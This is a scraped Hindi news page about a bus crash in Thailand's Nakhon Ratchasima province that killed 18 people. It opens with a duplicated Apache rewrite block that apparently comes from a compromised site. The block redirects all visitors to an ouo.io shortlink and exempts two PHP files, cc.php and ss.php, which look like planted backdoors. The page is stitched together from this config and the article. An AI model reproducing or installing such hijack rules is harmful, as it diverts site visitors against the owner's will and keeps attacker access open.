
RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]
BREAKING NEWS
Total views:- 603
Previousबैंकाक। थाइलैंड के पूर्वोत्तर इलाके में एक बस दुर्घटना में 18 लोगों की मौत हो गई और 32 लोग घायल हो गए। एजेंसी से प्राप्त समाचार के अनुसार "यह दुर्घटना नाखौन राचासीमा प्रांत के वांग नाम खियो जिले में एक ढलान के मोड़ पर हुई।"
अधिकारियों के अनुसार, बस चालक ने वाहन से अपना नियंत्रण खो दिया, जिस वजह से वाहन उल्टे लेन में प्रवेश कर सड़क से बाहर हो गई। बस में 50 लोग सवार थे, जिसमें से 16 की मौके पर ही मौत हो गई और दो अन्य की अस्पताल में इलाज के दौरान मौत हुई। बस में कालासिन प्रांत के पर्यटकों का समूह सवार था जो चांटाबुरी के तटीय इलाके से वापस घर लौट रहा था। विश्व स्वास्थ्य संगठन के अनुसार, थाइलैंड की सड़क दुनिया में सबसे खतरनाक सड़कों में दूसरे स्थान पर है और यहां प्रतिवर्ष सड़क दुर्घटना में लगभग 24,000 लोगों की मौत हो जाती है।